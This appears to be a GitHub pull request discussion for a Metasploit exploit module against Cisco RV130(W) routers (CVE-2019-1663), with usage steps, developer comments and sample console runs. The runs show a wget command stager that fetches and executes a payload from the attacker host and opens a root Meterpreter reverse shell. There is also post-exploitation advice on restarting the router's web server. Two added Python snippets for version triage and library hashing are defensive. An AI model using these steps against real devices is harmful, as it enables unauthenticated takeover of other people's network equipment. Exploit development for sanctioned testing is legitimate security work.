
Exploit for CVE-2019-1663 on Cisco RV130(W). #11613

Merged: 10 commits, Apr 12, 2019

Conversation

QKaiser commented Mar 22, 2019

Cisco RV130(W) Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.

Vulnerable Device

  • RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
  • RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/cisco_rv130_rmi_rce
  3. set rhost [IP]
  4. set payload linux/armle/meterpreter_reverse_tcp
  5. set lhost [IP]
  6. exploit
  7. You should get a session

Sample run:

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/FiGVSQDm60T
[*] Client 192.168.1.1 (Wget) requested /FiGVSQDm60T
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 7 opened (192.168.1.100:4444 -> 192.168.1.1:45947) at 2019-03-22 20:33:48 +0100
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

TODO

Confirm offsets for the following firmware versions:

  • 1.0.3.44
  • 1.0.3.28
  • 1.0.3.22
  • 1.0.3.16
  • 1.0.3.14
  • 1.0.2.7
  • 1.0.1.3
  • 1.0.0.21
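
The affected-version statement above (RV130 and RV130W prior to 1.0.3.45) is what an operator needs in order to find exposed units in an inventory rather than to exploit them. The following Python is an added example, not code from this pull request or from Metasploit: it assumes an inventory of rows with `host`, `model` and `version` keys (a constructed format), takes the fixed version 1.0.3.45 from the advisory text above, and compares versions numerically so that 1.0.3.9 ranks below 1.0.3.45 (plain string comparison gets that backwards). It generalises slightly beyond the text by accepting any number of dotted components.

```python
"""Flag Cisco RV130/RV130W firmware versions that predate the CVE-2019-1663 fix.

Added example; not part of the Metasploit module or of this pull request.
The fixed version (1.0.3.45) is the one stated in the advisory text of the PR.
"""
from __future__ import annotations

import re
from typing import NamedTuple

# First firmware release that is NOT affected, per the advisory text.
FIXED_VERSION = {
    "RV130": "1.0.3.45",
    "RV130W": "1.0.3.45",
}

_VERSION_RE = re.compile(r"^\d+(?:\.\d+)*$")


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '1.0.3.28' into (1, 0, 3, 28).

    Comparing tuples of integers (not strings) avoids the classic mistake
    where '1.0.3.9' sorts after '1.0.3.45' lexicographically.
    """
    text = text.strip()
    if not _VERSION_RE.match(text):
        raise ValueError(f"not a dotted firmware version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def is_affected(model: str, version: str) -> bool:
    """True if `version` of `model` predates the fixed release."""
    model = model.strip().upper()
    try:
        fixed = FIXED_VERSION[model]
    except KeyError:
        raise ValueError(f"no fix data for model {model!r}") from None
    return parse_version(version) < parse_version(fixed)


class Finding(NamedTuple):
    host: str
    model: str
    version: str
    affected: bool


def triage(inventory: list[dict]) -> list[Finding]:
    """Tag every inventory row; models without fix data are skipped, not guessed at."""
    findings = []
    for row in inventory:
        try:
            affected = is_affected(row["model"], row["version"])
        except ValueError:
            continue
        findings.append(Finding(row["host"], row["model"].upper(), row["version"], affected))
    return findings


# Constructed sample inventory: hosts are made up; the version numbers are
# chosen to mirror ones discussed in the PR plus one lexicographic trap.
SAMPLE_INVENTORY = [
    {"host": "10.0.0.1", "model": "RV130W", "version": "1.0.3.28"},
    {"host": "10.0.0.2", "model": "RV130", "version": "1.0.3.45"},
    {"host": "10.0.0.3", "model": "RV130W", "version": "1.0.3.9"},   # string compare would miss this
    {"host": "10.0.0.4", "model": "RV130W", "version": "1.0.3.50"},
    {"host": "10.0.0.5", "model": "RV320", "version": "1.4.2.17"},   # no fix data here: skipped
]

if __name__ == "__main__":
    for f in triage(SAMPLE_INVENTORY):
        print(f"{f.host:<10} {f.model:<7} {f.version:<9} {'AFFECTED' if f.affected else 'ok'}")
```

Rows whose model is not in `FIXED_VERSION` are dropped rather than reported as safe, so the output never under-reports a device the table simply does not know about.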

QKaiser commented Mar 22, 2019

Just confirmed all versions have the same offsets. They've been using the same libc version since first release:

find -name "libc.so.0" -exec sha1sum {} \;
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.0.21/_RV130X_FW_1.0.0.21.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.1.3/_RV130X_FW_1.0.1.3.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.44/_RV130X_FW_1.0.3.44.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.22/_RV130X_FW_1.0.3.22.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.28/_RV130X_FW_1.0.3.28.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.14/_RV130X_FW_1.0.3.14.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.2.7/_RV130X_FW_1.0.2.7.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.16/_RV130X_FW_1.0.3.16.bin.extracted/squashfs-root/lib/libc.so.0
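
The find/sha1sum check above answers the exploit author's question (do the same offsets cover every release?), and the same comparison matters defensively: a libc that has not changed across eight releases means the whole installed base shares one attack surface. The Python below is an added example, not from this pull request or from Metasploit. It reruns that check as a function over a directory of extracted firmware trees (one subdirectory per version, laid out like the binwalk-style paths in the listing above), groups versions by the SHA-1 of the named library, and reports versions where the library is missing instead of silently dropping them. The tree and file contents it runs against are constructed in a temporary directory; nothing here reads real Cisco firmware.

```python
"""Group extracted firmware trees by the SHA-1 of one shared library.

Added example, not part of this pull request or of Metasploit. The tree it
runs against is constructed in a temporary directory (no real firmware).
"""
from __future__ import annotations

import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Optional


def sha1_of_bytes(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path: Path) -> str:
    """Stream the file so a large library never has to fit in memory."""
    digest = hashlib.sha1()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def group_by_library(root: Path, library: str = "libc.so.0") -> dict[str, list[str]]:
    """Map SHA-1 -> sorted list of version directories whose tree contains `library`.

    `root` holds one subdirectory per firmware version (root/1.0.3.28/...).
    The first file named `library` under each version directory is hashed;
    versions without one are collected under the key "missing", because a
    missing libc usually means the extraction failed, not that the release
    has no libc.
    """
    groups: dict[str, list[str]] = defaultdict(list)
    for version_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        matches = sorted(version_dir.rglob(library))
        key = sha1_of_file(matches[0]) if matches else "missing"
        groups[key].append(version_dir.name)
    return dict(groups)


def single_build(groups: dict[str, list[str]]) -> bool:
    """True when every version shipped one identical library and none is missing."""
    return len(groups) == 1 and "missing" not in groups


def build_sample_tree(root: Path, versions: dict[str, Optional[bytes]]) -> None:
    """Create root/<version>/_RV130X_FW_<version>.bin.extracted/squashfs-root/lib/libc.so.0.

    A version mapped to None gets the directory skeleton but no libc file.
    """
    for version, payload in versions.items():
        lib_dir = (root / version / f"_RV130X_FW_{version}.bin.extracted"
                   / "squashfs-root" / "lib")
        lib_dir.mkdir(parents=True)
        if payload is not None:
            (lib_dir / "libc.so.0").write_bytes(payload)


# Constructed sample. The five version labels mirror releases named in the
# thread and share identical bytes; the last two entries are invented: one
# release with a rebuilt library and one whose extraction produced no libc.
SAMPLE_VERSIONS: dict[str, Optional[bytes]] = {
    "1.0.0.21": b"fake-libc-build-A",
    "1.0.1.3": b"fake-libc-build-A",
    "1.0.2.7": b"fake-libc-build-A",
    "1.0.3.28": b"fake-libc-build-A",
    "1.0.3.44": b"fake-libc-build-A",
    "rebuilt-sample": b"fake-libc-build-B",
    "broken-extract": None,
}


def run_sample() -> dict[str, list[str]]:
    """Build the sample tree in a temp dir, group it, and return the groups."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root, SAMPLE_VERSIONS)
        return group_by_library(root)


if __name__ == "__main__":
    groups = run_sample()
    for digest, versions in groups.items():
        print(f"{digest:<40}  {', '.join(versions)}")
    print("single build across all versions:", single_build(groups))
```

Point `group_by_library` at a directory of real extractions (one subdirectory per version) to get the same grouping the one-liner above produced by eye; `single_build` is the yes/no answer, and any `"missing"` group is a sign to re-check the extraction before drawing conclusions about that release.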

QKaiser commented Mar 22, 2019

@wvu-r7 given there is no process continuation here, the httpd server will stop and there is no watchdog on the device taking care of restart. Is there a way to automatically execute a command once a shell lands?

If not, I'll just put this in the documentation for operators who want to leave the device operating normally:

meterpreter > pkill -x 'httpd'
Filtering on 'httpd'
Killing: 816, 808
meterpreter > cd /www
meterpreter > execute -f /usr/sbin/httpd
Process 30019 created.
meterpreter > execute -f /usr/sbin/httpd -a '-S'
Process 30061 created.

wvu-r7 commented Mar 22, 2019

@QKaiser: Look at modules using on_new_session and shell_command_token. I think that'll work for you.

wvu-r7 self-assigned this Mar 22, 2019

bcoles commented Mar 23, 2019

> @QKaiser: Look at modules using on_new_session and shell_command_token. I think that'll work for you.

You may or may not need to do something like this, to handle shell sessions and meterpreter sessions differently.

  # Metasploit hook: called once for each session the exploit opens.
  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      # Meterpreter needs the stdapi extension loaded before process APIs exist.
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"some commands\""
    else
      # Plain shell session: send the command over the shell channel instead.
      session.shell_command("some commands")
    end
  ensure
    # Always run the parent implementation, whatever happened above.
    super
  end
bcoles added the docs label Mar 23, 2019

QKaiser commented Mar 24, 2019

Thanks for the pointers towards on_new_session :) Implemented with 4451225

bcoles commented Mar 24, 2019

This looks reasonable to me. There are some minor issues with indentation and hash rocket alignment in the module boilerplate header. Also CISCO-SA is not a supported Reference key.

Given that there's a high chance of device DoS, this should be mentioned in the module description. It's worth noting that successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server.

I'm not sure if any msf devs have any of these devices lying around, in which case whoever handles this PR may request you provide a PCAP. You can do so via uploading as an attachment to this PR, or emailing msfdev [at] metasploit.com

QKaiser commented Mar 24, 2019

I removed the CISCO-SA reference key and mentioned potential DoS in the module description.

I'll keep an eye on this PR and provide PCAPs if required. Thanks again for the support :)

wvu-r7 commented Mar 25, 2019

I believe we bought a device for #11435. I'll be using that if I can.

QKaiser commented Mar 25, 2019

> I believe we bought a device for #11435. I'll be using that if I can.

This is not the same device. The RV320 is a MIPS-based device while RV130(W) is ARM-based :)

Note that even if CVE-2019-1663 is the same issue affecting RV130(W) / RV110(W) / RV215(W) devices, this module will only work against RV130(W) given that RV110(W) and RV215(W) are MIPSEL devices.

wvu-r7 commented Mar 25, 2019

Ah, my bad. I thought I saw both model numbers in one of the tickets, but clearly I was mistaken.

wvu-r7 commented Mar 27, 2019

We've ordered a test device that should be here soon. Emulating this with QEMU system (and Firmadyne) has been... reluctant.

QKaiser commented Mar 28, 2019

> Emulating this with QEMU system (and Firmadyne) has been... reluctant.

I know that feel. Just managed to make the RV110 HTTP server work on system-qemu-mipsel.

If everything works as expected, I should be able to get similar exploits for RV110/RV215. Currently hunting down people who might have one of these.

wvu-r7 commented Apr 3, 2019

First test!

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/TbsTw0cDOqmms92
[*] Local IP: http://192.168.8.245:8080/TbsTw0cDOqmms92
[*] Generated command stager: ["wget -qO /tmp/nZnrqiSg http://192.168.1.100:8080/TbsTw0cDOqmms92;chmod +x /tmp/nZnrqiSg;/tmp/nZnrqiSg;rm -f /tmp/nZnrqiSg"]
[*] Client 192.168.1.1 (Wget) requested /TbsTw0cDOqmms92
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:53135) at 2019-04-03 15:08:04 -0500
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >

wvu-r7 commented Apr 3, 2019

Running into some instability (potential bug in Meterpreter):

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > getuid
[-] Error running command getuid: Rex::TimeoutError Operation timed out.
meterpreter >

wvu-r7 commented Apr 11, 2019

Once #11710 lands, ls should be fixed in Meterpreter. I'll give this a final test and land after that happens.

wvu-r7 commented Apr 11, 2019

Meterpreter ls fixed after I landed #11710:

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > ls
Listing: /www
=============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  591     fil   2017-03-30 04:24:02 -0500  Authorized_AP_Template.csv
100644/rw-r--r--  3830    fil   2017-03-30 04:24:02 -0500  BT.asp
100644/rw-r--r--  2796    fil   2017-03-30 04:24:02 -0500  BT_common.js
100644/rw-r--r--  6846    fil   2017-03-30 04:24:02 -0500  Diagnostics.asp
100644/rw-r--r--  1327    fil   2017-03-30 04:24:02 -0500  P.js
100644/rw-r--r--  9802    fil   2017-03-30 04:24:02 -0500  RSTP.asp
100644/rw-r--r--  1280    fil   2017-03-30 04:24:02 -0500  Radius.asp
100644/rw-r--r--  1601    fil   2017-03-30 04:24:02 -0500  Success.asp
100644/rw-r--r--  12130   fil   2017-03-30 04:24:02 -0500  TR.asp
100644/rw-r--r--  628     fil   2017-03-30 04:24:02 -0500  User_Import_Template.csv
100644/rw-r--r--  2866    fil   2017-03-30 04:24:02 -0500  VPN.asp
100644/rw-r--r--  7243    fil   2017-03-30 04:24:02 -0500  WEP.asp
100644/rw-r--r--  14548   fil   2017-03-30 04:24:02 -0500  WL_WPATable.asp
100644/rw-r--r--  3409    fil   2017-03-30 04:24:02 -0500  WPA_Preshared.asp
100644/rw-r--r--  570     fil   2017-03-30 04:24:02 -0500  WPA_Radius.asp
100644/rw-r--r--  8300    fil   2017-03-30 04:24:02 -0500  Wireless_Advanced.asp
100644/rw-r--r--  10607   fil   2017-03-30 04:24:02 -0500  Wireless_MAC.asp
100644/rw-r--r--  38320   fil   2017-03-30 04:24:02 -0500  Wireless_Manual.asp
100644/rw-r--r--  16250   fil   2017-03-30 04:24:02 -0500  Wireless_WPS.asp
100644/rw-r--r--  5652    fil   2017-03-30 04:24:02 -0500  Wireless_captive.asp
100644/rw-r--r--  11056   fil   2017-03-30 04:24:02 -0500  Wireless_user.asp
100644/rw-r--r--  5491    fil   2017-03-30 04:24:02 -0500  Wireless_welcome.asp
100644/rw-r--r--  12370   fil   2017-03-30 04:24:02 -0500  Wireless_welcome_edit.asp
100644/rw-r--r--  3868    fil   2017-03-30 04:24:02 -0500  Wireless_welcome_prev.asp
100644/rw-r--r--  2477    fil   2017-03-30 04:24:02 -0500  about.asp
100644/rw-r--r--  3520    fil   2017-03-30 04:24:02 -0500  access_gnet.asp
100644/rw-r--r--  6407    fil   2017-03-30 04:24:02 -0500  access_time.asp
100644/rw-r--r--  4620    fil   2017-03-30 04:24:02 -0500  activelist.asp
100644/rw-r--r--  15509   fil   2017-03-30 04:24:02 -0500  adv_prefixes.asp
100644/rw-r--r--  3324    fil   2017-03-30 04:24:02 -0500  alert_msg.asp
100644/rw-r--r--  23165   fil   2017-03-30 04:24:02 -0500  authap.asp
100644/rw-r--r--  16417   fil   2017-03-30 04:24:02 -0500  backup.asp
100644/rw-r--r--  36862   fil   2017-03-30 04:24:02 -0500  bandwidth.asp
100644/rw-r--r--  2058    fil   2017-03-30 04:24:02 -0500  base64.js
100644/rw-r--r--  4156    fil   2017-03-30 04:24:02 -0500  bonjour.asp
100644/rw-r--r--  19511   fil   2017-03-30 04:24:02 -0500  bsd_log_email.asp
100644/rw-r--r--  1019    fil   2017-03-30 04:24:02 -0500  bsd_show_step.asp
100644/rw-r--r--  22009   fil   2017-03-30 04:24:02 -0500  captive_login.asp
100644/rw-r--r--  24255   fil   2017-03-30 04:24:02 -0500  category.asp
100644/rw-r--r--  2252    fil   2017-03-30 04:24:02 -0500  cert_data.asp
100644/rw-r--r--  3005    fil   2017-03-30 04:24:02 -0500  cert_upload.asp
100644/rw-r--r--  10713   fil   2017-03-30 04:24:02 -0500  change_password.asp
100644/rw-r--r--  1739    fil   2017-03-30 04:24:02 -0500  change_password_tree.asp
100644/rw-r--r--  1014    fil   2017-03-30 04:24:02 -0500  check_session.asp
100644/rw-r--r--  419     fil   2017-03-30 04:24:02 -0500  check_status.asp
100644/rw-r--r--  87058   fil   2017-03-30 04:24:02 -0500  common.js
100644/rw-r--r--  1774    fil   2017-03-30 04:24:02 -0500  config_change_pwd.asp
100644/rw-r--r--  2616    fil   2017-03-30 04:24:02 -0500  config_user.asp
100644/rw-r--r--  3844    fil   2017-03-30 04:24:02 -0500  cos.asp
100644/rw-r--r--  50850   fil   2017-03-30 04:24:02 -0500  cues_drawn.js
100644/rw-r--r--  50949   fil   2017-03-30 04:24:02 -0500  cues_taglib.css
100644/rw-r--r--  276464  fil   2017-03-30 04:24:02 -0500  cues_taglib.js
100644/rw-r--r--  7810    fil   2017-03-30 04:24:02 -0500  cues_taglib_layout.js
100644/rw-r--r--  22473   fil   2017-03-30 04:24:02 -0500  dashboard.asp
100644/rw-r--r--  1467    fil   2017-03-30 04:24:02 -0500  dbg_diag.asp
100644/rw-r--r--  18954   fil   2017-03-30 04:24:02 -0500  ddns.asp
100644/rw-r--r--  24781   fil   2017-03-30 04:24:02 -0500  default.asp
100644/rw-r--r--  3231    fil   2017-03-30 04:24:02 -0500  define.js
100644/rw-r--r--  2944    fil   2017-03-30 04:24:02 -0500  device.asp
100644/rw-r--r--  5133    fil   2017-03-30 04:24:02 -0500  dhcp_leased_client.asp
100644/rw-r--r--  4474    fil   2017-03-30 04:24:02 -0500  dmz_host.asp
100644/rw-r--r--  6718    fil   2017-03-30 04:24:02 -0500  dscp.asp
100644/rw-r--r--  4555    fil   2017-03-30 04:24:02 -0500  ea_domain.asp
100644/rw-r--r--  6365    fil   2017-03-30 04:24:02 -0500  ea_domain_edit.asp
100644/rw-r--r--  6087    fil   2017-03-30 04:24:02 -0500  ea_group.asp
100644/rw-r--r--  3690    fil   2017-03-30 04:24:02 -0500  ea_group_edit.asp
100644/rw-r--r--  6615    fil   2017-03-30 04:24:02 -0500  ea_user.asp
100644/rw-r--r--  6428    fil   2017-03-30 04:24:02 -0500  ea_user_browser.asp
100644/rw-r--r--  4133    fil   2017-03-30 04:24:02 -0500  ea_user_edit.asp
100644/rw-r--r--  7348    fil   2017-03-30 04:24:02 -0500  ea_user_ip.asp
100644/rw-r--r--  2672    fil   2017-03-30 04:24:02 -0500  ea_user_loginpolicy.asp
100644/rw-r--r--  144     fil   2017-03-30 04:24:02 -0500  encode_data.js
100644/rw-r--r--  45519   fil   2017-03-30 04:24:02 -0500  except.asp
100644/rw-r--r--  1869    fil   2017-03-30 04:24:02 -0500  factory.asp
100644/rw-r--r--  19005   fil   2017-03-30 04:24:02 -0500  failover.asp
100644/rw-r--r--  976     fil   2017-03-30 04:24:02 -0500  filelink.asp
100644/rw-r--r--  9742    fil   2017-03-30 04:24:02 -0500  filter.asp
100644/rw-r--r--  36170   fil   2017-03-30 04:24:02 -0500  filter_edit.asp
100644/rw-r--r--  19637   fil   2017-03-30 04:24:02 -0500  firewall.asp
100644/rw-r--r--  50131   fil   2017-03-30 04:24:02 -0500  func.js
100644/rw-r--r--  3822    fil   2017-03-30 04:24:02 -0500  gen_cert.asp
100644/rw-r--r--  200     fil   2017-03-30 04:24:02 -0500  get_card_info.asp
100644/rw-r--r--  98      fil   2017-03-30 04:24:02 -0500  get_redirect.asp
100644/rw-r--r--  1978    fil   2017-03-30 04:24:02 -0500  getconnst.asp
100644/rw-r--r--  144     fil   2017-03-30 04:24:02 -0500  getconnst_1.asp
100644/rw-r--r--  7430    fil   2017-03-30 04:24:02 -0500  getstart.asp
100644/rw-r--r--  4338    fil   2017-03-30 04:24:02 -0500  getstatus.asp
100644/rw-r--r--  420     fil   2017-03-30 04:24:02 -0500  guest.asp
100644/rw-r--r--  1098    fil   2017-03-30 04:24:02 -0500  guest1.asp
100644/rw-r--r--  10906   fil   2017-03-30 04:24:02 -0500  guest_info.asp
40755/rwxr-xr-x   82      dir   2017-03-30 04:24:02 -0500  help
100644/rw-r--r--  19202   fil   2017-03-30 04:24:02 -0500  ike_edit.asp
40755/rwxr-xr-x   2546    dir   2017-03-30 04:24:02 -0500  image
100644/rw-r--r--  52389   fil   2017-03-30 04:24:02 -0500  imgfix.css
100644/rw-r--r--  2964    fil   2017-03-30 04:24:02 -0500  index_l2tp.asp
100644/rw-r--r--  176     fil   2017-03-30 04:24:02 -0500  index_pppoe.asp
100644/rw-r--r--  1106    fil   2017-03-30 04:24:02 -0500  index_pptp.asp
100644/rw-r--r--  1941    fil   2017-03-30 04:24:02 -0500  index_static.asp
100644/rw-r--r--  16482   fil   2017-03-30 04:24:02 -0500  ip_based_acl.asp
100644/rw-r--r--  29559   fil   2017-03-30 04:24:02 -0500  ip_based_acl_edit.asp
100644/rw-r--r--  9098    fil   2017-03-30 04:24:02 -0500  ip_based_acl_order.asp
100644/rw-r--r--  8011    fil   2017-03-30 04:24:02 -0500  ip_mode.asp
100644/rw-r--r--  33457   fil   2017-03-30 04:24:02 -0500  ipsec_edit.asp
100644/rw-r--r--  13542   fil   2017-03-30 04:24:02 -0500  ipsec_setup.asp
100644/rw-r--r--  7803    fil   2017-03-30 04:24:02 -0500  ipsec_user.asp
100644/rw-r--r--  16048   fil   2017-03-30 04:24:02 -0500  ipv6_routing.asp
100644/rw-r--r--  27020   fil   2017-03-30 04:24:02 -0500  lan.asp
100644/rw-r--r--  12730   fil   2017-03-30 04:24:02 -0500  lan_host.asp
100644/rw-r--r--  18960   fil   2017-03-30 04:24:02 -0500  lan_ipv6.asp
40755/rwxr-xr-x   316     dir   2017-03-30 04:24:02 -0500  lang_pack
100644/rw-r--r--  1485    fil   2017-03-30 04:24:02 -0500  license.asp
100644/rw-r--r--  10246   fil   2017-03-30 04:24:02 -0500  license.js
100644/rw-r--r--  3640    fil   2017-03-30 04:24:02 -0500  linkagg.asp
100644/rw-r--r--  26586   fil   2017-03-30 04:24:02 -0500  log.asp
100644/rw-r--r--  21115   fil   2017-03-30 04:24:02 -0500  log_email.asp
100644/rw-r--r--  13804   fil   2017-03-30 04:24:02 -0500  login.asp
100644/rw-r--r--  13479   fil   2017-03-30 04:24:02 -0500  login_guest.asp
100644/rw-r--r--  4303    fil   2017-03-30 04:24:02 -0500  macclone.asp
100644/rw-r--r--  5578    fil   2017-03-30 04:24:02 -0500  man_cerificate.asp
100644/rw-r--r--  8827    fil   2017-03-30 04:24:02 -0500  md5.js
100644/rw-r--r--  18775   fil   2017-03-30 04:24:02 -0500  mobile.asp
100644/rw-r--r--  7865    fil   2017-03-30 04:24:02 -0500  mobile_dl.asp
100644/rw-r--r--  16973   fil   2017-03-30 04:24:02 -0500  nat_1to1.asp
100644/rw-r--r--  4678    fil   2017-03-30 04:24:02 -0500  network_tools.asp
100644/rw-r--r--  5992    fil   2017-03-30 04:24:02 -0500  password.asp
100644/rw-r--r--  1573    fil   2017-03-30 04:24:02 -0500  pngfix.js
100644/rw-r--r--  939     fil   2017-03-30 04:24:02 -0500  pollingst.asp
100644/rw-r--r--  494     fil   2017-03-30 04:24:02 -0500  port_info.asp
100644/rw-r--r--  7101    fil   2017-03-30 04:24:02 -0500  port_management.asp
100644/rw-r--r--  3844    fil   2017-03-30 04:24:02 -0500  port_mirror.asp
100644/rw-r--r--  9032    fil   2017-03-30 04:24:02 -0500  portal_chgpwd.asp
100644/rw-r--r--  2179    fil   2017-03-30 04:24:02 -0500  portal_info.asp
100644/rw-r--r--  5625    fil   2017-03-30 04:24:02 -0500  portal_layouts.asp
100644/rw-r--r--  4583    fil   2017-03-30 04:24:02 -0500  portal_layouts_edit.asp
100644/rw-r--r--  1934    fil   2017-03-30 04:24:02 -0500  portal_port_forwarding.asp
100644/rw-r--r--  2033    fil   2017-03-30 04:24:02 -0500  portal_vpntunnel.asp
100644/rw-r--r--  12606   fil   2017-03-30 04:24:02 -0500  portforward.asp
100644/rw-r--r--  1963    fil   2017-03-30 04:24:02 -0500  portst.asp
100644/rw-r--r--  4812    fil   2017-03-30 04:24:02 -0500  position.js
100644/rw-r--r--  4344    fil   2017-03-30 04:24:02 -0500  position_portal.js
100644/rw-r--r--  12479   fil   2017-03-30 04:24:02 -0500  position_url.asp
100644/rw-r--r--  4321    fil   2017-03-30 04:24:02 -0500  position_url_ap.asp
100644/rw-r--r--  589     fil   2017-03-30 04:24:02 -0500  position_url_portal.asp
100644/rw-r--r--  5304    fil   2017-03-30 04:24:02 -0500  pppoe_profile.asp
100644/rw-r--r--  11376   fil   2017-03-30 04:24:02 -0500  pppoe_profile_edit.asp
100644/rw-r--r--  5661    fil   2017-03-30 04:24:02 -0500  qos_port.asp
100644/rw-r--r--  16009   fil   2017-03-30 04:24:02 -0500  rac_ike_edit.asp
100644/rw-r--r--  28158   fil   2017-03-30 04:24:02 -0500  rac_ipsec_edit.asp
100644/rw-r--r--  18535   fil   2017-03-30 04:24:02 -0500  rac_vpn_adv.asp
100644/rw-r--r--  1260    fil   2017-03-30 04:24:02 -0500  rdt_download.asp
100644/rw-r--r--  1837    fil   2017-03-30 04:24:02 -0500  reboot.asp
100644/rw-r--r--  6030    fil   2017-03-30 04:24:02 -0500  resources.asp
100644/rw-r--r--  8652    fil   2017-03-30 04:24:02 -0500  resources_edit.asp
100644/rw-r--r--  1585    fil   2017-03-30 04:24:02 -0500  ripng.asp
100644/rw-r--r--  21194   fil   2017-03-30 04:24:02 -0500  router_ad.asp
100644/rw-r--r--  20318   fil   2017-03-30 04:24:02 -0500  routing.asp
100644/rw-r--r--  6005    fil   2017-03-30 04:24:02 -0500  routingtb.asp
100644/rw-r--r--  7809    fil   2017-03-30 04:24:02 -0500  schedule_manage.asp
100644/rw-r--r--  11327   fil   2017-03-30 04:24:02 -0500  schedule_manage_edit.asp
100644/rw-r--r--  580     fil   2017-03-30 04:24:02 -0500  security_pwd_count.js
100644/rw-r--r--  15915   fil   2017-03-30 04:24:02 -0500  service_manage.asp
100644/rw-r--r--  1871    fil   2017-03-30 04:24:02 -0500  session_timeout.asp
100644/rw-r--r--  13458   fil   2017-03-30 04:24:02 -0500  singleforward.asp
100644/rw-r--r--  7637    fil   2017-03-30 04:24:02 -0500  site_survey.asp
100644/rw-r--r--  17927   fil   2017-03-30 04:24:02 -0500  snmp.asp
100644/rw-r--r--  7985    fil   2017-03-30 04:24:02 -0500  ssl_cert.asp
100644/rw-r--r--  4435    fil   2017-03-30 04:24:02 -0500  ssl_client_route.asp
100644/rw-r--r--  10854   fil   2017-03-30 04:24:02 -0500  ssl_port_forwarding.asp
100644/rw-r--r--  3386    fil   2017-03-30 04:24:02 -0500  ssl_vpn_client.asp
100644/rw-r--r--  7309    fil   2017-03-30 04:24:02 -0500  ssl_vpn_policies.asp
100644/rw-r--r--  7956    fil   2017-03-30 04:24:02 -0500  ssl_vpn_policies_edit.asp
100644/rw-r--r--  381     fil   2017-03-30 04:24:02 -0500  ssl_vpn_portal.asp
100644/rw-r--r--  17827   fil   2017-03-30 04:24:02 -0500  static_dhcp.asp
100644/rw-r--r--  3732    fil   2017-03-30 04:24:02 -0500  status_captive.asp
100644/rw-r--r--  5236    fil   2017-03-30 04:24:02 -0500  status_guestnet.asp
100644/rw-r--r--  9762    fil   2017-03-30 04:24:02 -0500  status_ipsec.asp
100644/rw-r--r--  3757    fil   2017-03-30 04:24:02 -0500  status_ipv6.asp
100644/rw-r--r--  4743    fil   2017-03-30 04:24:02 -0500  status_mobile.asp
100644/rw-r--r--  6910    fil   2017-03-30 04:24:02 -0500  status_pptp.asp
100644/rw-r--r--  9569    fil   2017-03-30 04:24:02 -0500  status_rac_ipsec.asp
100644/rw-r--r--  8793    fil   2017-03-30 04:24:02 -0500  status_sitetosite.asp
100644/rw-r--r--  3420    fil   2017-03-30 04:24:02 -0500  status_upgrade.asp
